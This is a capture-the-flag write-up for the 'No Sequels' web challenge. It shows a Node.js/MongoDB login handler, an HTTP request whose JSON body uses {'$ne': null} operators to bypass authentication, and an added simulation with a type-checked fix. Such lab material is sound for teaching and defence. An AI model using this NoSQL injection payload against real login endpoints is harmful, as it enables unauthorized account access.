Tags: nosql-injection web 


# ▼▼▼No Sequels(Web:50pts、solved:312/1374=22.7%)▼▼▼

This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

The prequels sucked, and the sequels aren't much better, but at least we always have the original trilogy.

Author: SirIan

Hint: MongoDB is a safer alternative to SQL, right?


## 【source code】

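```javascript
app.use(bodyParser.urlencoded({ extended: false }));


router.post('/login', verifyJwt, function (req, res) {
    // monk instance
    var db = req.db;

    // Taken straight from the request body; never checked to be strings
    var user = req.body.username;
    var pass = req.body.password;

    if (!user || !pass){
        res.send("One or more fields were not provided.");
        return;
    }
    // Request values are used as the query as-is, so an object such as
    // {"$ne": null} is interpreted as a MongoDB operator (the injection point)
    var query = {
        username: user,
        password: pass
    };

    db.collection('users').findOne(query, function (err, user) {
        if (!user){
            res.send("Wrong username or password");
            return;
        }

        res.cookie('token', jwt.sign({name: user.username, authenticated: true}, secret));
        // (the excerpt ends here)
    });
});
```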


## 【understanding functions】

・Login function exists


## 【exploit】

From the title, I think this is NoSQL injection.

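The urlencoded parser with `extended: false` only yields plain string values, but **Node.js** can also receive parameters in JSON format, so send the following **request converted to JSON format**. Each field is an object holding the `$ne` (not equal) operator instead of a string, so the query matches any user whose username and password are not null: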

```http
POST /login HTTP/1.1
Host: nosequels.2019.chall.actf.co
Content-Length: 67
Content-Type: application/json
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRoZW50aWNhdGVkIjpmYWxzZSwiaWF0IjoxNTU1ODA0Nzc5fQ.N1GQCY5ZtBNZD-O9CK7nImn_jQjCqGdbE-46U4nDLQE

{
    "username": {"$ne": null},
    "password": {"$ne": null}
}
```
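
Why that body passes the login check, and a type check that refuses it, as an added example that is not part of the original writeup or the challenge source. `matches()` and `findOne()` are a simplified stand-in for MongoDB query matching (equality and `$ne` only), `vulnerableLogin` and `hardenedLogin` are hypothetical names, and the user record is constructed sample data.

```javascript
// Constructed sample record; plaintext password only mirrors the page's handler.
const users = [{ username: 'admin', password: 'constructed-secret' }];

// Simplified stand-in for MongoDB matching: exact equality and $ne only.
function matches(doc, query) {
  return Object.entries(query).every(([field, cond]) => {
    const value = doc[field] ?? null; // a missing field compares like null
    if (cond !== null && typeof cond === 'object') {
      return Object.entries(cond).every(([op, arg]) => {
        if (op !== '$ne') throw new Error('operator not modelled: ' + op);
        return value !== arg;
      });
    }
    return value === cond;
  });
}

function findOne(query) {
  return users.find((u) => matches(u, query)) || null;
}

// Same shape as the handler on the page: body values go straight into the query.
function vulnerableLogin(body) {
  const user = body.username;
  const pass = body.password;
  if (!user || !pass) return { ok: false, reason: 'missing field' };
  const found = findOne({ username: user, password: pass });
  return found ? { ok: true, name: found.username } : { ok: false, reason: 'wrong' };
}

// Hardened: only strings may reach the query, so operator objects are refused.
function hardenedLogin(body) {
  const { username, password } = body;
  if (typeof username !== 'string' || typeof password !== 'string') {
    return { ok: false, reason: 'invalid type' };
  }
  const found = findOne({ username, password });
  return found ? { ok: true, name: found.username } : { ok: false, reason: 'wrong' };
}

// The JSON body from the request above, parsed the way a JSON body parser would.
const jsonBody = JSON.parse('{"username": {"$ne": null}, "password": {"$ne": null}}');
console.log('vulnerable:', vulnerableLogin(jsonBody));
console.log('hardened:  ', hardenedLogin(jsonBody));
console.log('hardened, string credentials:',
  hardenedLogin({ username: 'admin', password: 'constructed-secret' }));
```

In the real handler the same `typeof ... !== 'string'` check would sit before the `query` object is built.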